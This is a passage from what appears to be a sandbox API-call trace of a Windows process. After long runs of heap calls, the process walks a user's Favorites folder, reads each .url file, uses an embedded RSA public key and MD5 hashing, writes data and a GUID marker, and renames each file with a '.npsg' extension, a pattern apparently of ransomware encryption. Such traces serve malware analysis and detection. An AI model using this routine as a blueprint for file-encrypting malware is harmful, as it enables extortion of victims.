| out: hHeap=0x620000) returned 1 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.819] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0237.819] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0237.820] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.820] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.820] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.820] PathFindFileNameW (pszPath="") returned="" [0237.820] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.821] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.821] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0237.821] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0237.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.822] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.822] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.825] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.825] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.826] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.826] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.826] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.826] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.826] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.827] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.827] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.827] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.827] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.827] GetLastError () returned 0x0 [0237.827] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.827] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.828] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.828] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.828] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.828] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.828] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.828] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.829] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.829] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.829] CloseHandle (hObject=0x644) returned 1 [0237.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0237.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.832] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.npsg")) returned 1 [0237.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.833] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70e008 | out: hHeap=0x620000) returned 1 [0237.835] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0237.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70e008 [0237.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.835] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0237.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.836] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.836] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.839] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.839] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.840] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.840] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.840] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.841] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.842] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.842] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.842] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.842] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.842] GetLastError () returned 0x0 [0237.842] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.842] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.842] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.842] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.842] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.842] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34095f0 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400758 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409638 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400770 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007a0 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400800 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007b8 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.843] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007a0 | out: hHeap=0x620000) returned 1 [0237.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 